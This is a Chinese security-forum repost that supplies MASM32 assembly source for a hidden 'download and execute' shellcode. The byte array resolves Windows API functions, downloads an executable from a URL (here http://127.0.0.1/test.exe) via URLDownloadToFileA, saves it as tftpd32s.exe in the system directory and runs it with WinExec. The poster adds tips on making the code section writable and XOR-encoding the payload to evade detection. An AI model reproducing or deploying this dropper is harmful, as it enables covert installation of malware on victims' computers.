论坛: 菜鸟乐园 标题: [转帖]下载程序并自动运行的源码!(隐藏运行) 复制本贴地址    
作者: yimarong [yimarong]    版主   登录
 [转帖]下载程序并自动运行的源码!(隐藏运行) 
下载程序并自动运行的源码!(隐藏运行) 
来自http://www.chinaycg.com/bbs/

刚刚调试好的,由于版面的原因没有怎么对齐,自己用的时候请调整好

生成程序后用peditor打开文件,改.text属性为E0000020表示可写
不然会报错!
我不知道masm32怎么定义代码段可写,所以就用这个方法了,请大侠指教。

开头有一段80340b00,你可把00改为别的代码,就可对这段程序xor加密




;down and exec code 
      .386
      .model flat, stdcall
      option casemap :none    case sensitive

; #########################################################################

   include \masm32\include\windows.inc
  .code  

down_exec DB 0EBH,010H,05BH,04BH,033H,0C9H,066H,0B9H,04CH,001H,080H,034H,00BH,00H
DB 0E2H,0FAH,0EBH,005H,0E8H,0EBH,0FFH,0FFH,0FFH
DB 0E9H,0e4H,000H,000H
DB 000H,05AH,0B8H,00CH,0F0H,0FDH,07FH,08BH,000H,08BH,070H,01CH,0ADH,08BH,040H,008H
DB 08BH,0D8H,08BH,073H,03CH,003H,0F3H,08BH,076H,078H,003H,0F3H,08BH,07EH,020H,003H
DB 0FBH,08BH,04EH,014H,033H,0EDH,056H,057H,051H,08BH,03FH,003H,0FBH,08BH,0F2H,06AH
DB 00EH,059H,0F3H,0A6H,074H,008H,059H,05FH,083H,0C7H,004H,045H,0E2H,0E9H,059H,05FH
DB 05EH,08BH,0CDH,08BH,046H,024H,003H,0C3H,0D1H,0E1H,003H,0C1H,033H,0C9H,066H,08BH
DB 008H,08BH,046H,01CH,003H,0C3H,0C1H,0E1H,002H,003H,0C1H,08BH,000H,003H,0C3H,08BH
DB 0FAH,08BH,0F7H,083H,0C6H
DB 00EH,08BH,0D0H,06AH,004H,059H
DB 0E8H,060H,000H,000H,000H,083H,0C6H,00DH,052H,056H,0FFH,057H,0FCH,05AH,08BH,0D8H
DB 06AH,001H,059H
DB 0E8H,04DH,000H,000H,000H
DB 083H,0C6H,013H,056H,046H,080H,03EH,080H,075H,0FAH,080H,036H,080H,05EH,083H,0ECH
DB 020H,08BH,0DCH,06AH,020H,053H,0FFH,057H,0ECH,0C7H,004H,003H
DB '\tft'                                
DB 0C7H,044H,003H,004H
DB 'pd32'
DB 0C7H,044H,003H,008H
DB 's.ex'
DB 0C7H,044H,003H,00CH
DB 'e',0,0,0
DB 033H,0C0H,050H,050H,053H,056H,050H,0FFH,057H,0FCH,08BH,0DCH,050H,053H,0FFH,057H
DB 0F0H,050H,0FFH,057H,0F4H,033H,0C0H,0ACH,085H,0C0H,075H,0F9H,051H,052H,056H,053H
DB 0FFH,0D2H,05AH,059H,0ABH,0E2H,0EEH,033H,0C0H,0C3H
DB 0E8H,017H,0FFH,0FFH
DB 0FFH,047H,065H,074H,050H,072H,06FH,063H,041H,064H,064H,072H,065H,073H,073H,000H
DB 047H,065H,074H,053H,079H,073H,074H,065H,06DH,044H,069H,072H,065H,063H,074H,06FH
DB 072H,079H,041H,000H,057H,069H,06EH,045H,078H,065H,063H,000H,045H,078H,069H,074H
DB 050H,072H,06FH,063H,065H,073H,073H,000H,04CH,06FH,061H,064H,04CH,069H,062H,072H
DB 061H,072H,079H,041H,000H,075H,072H,06CH,06DH,06FH,06EH,000H,055H,052H,04CH,044H
DB 06FH,077H,06EH,06CH,06FH,061H,064H,054H,06FH,046H,069H,06CH,065H,041H,000H
db "http://127.0.0.1/test.exe";;
db 080h
start:
lea eax,down_exec
jmp eax
end start

 


地主 发表时间: 08/23 10:20

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号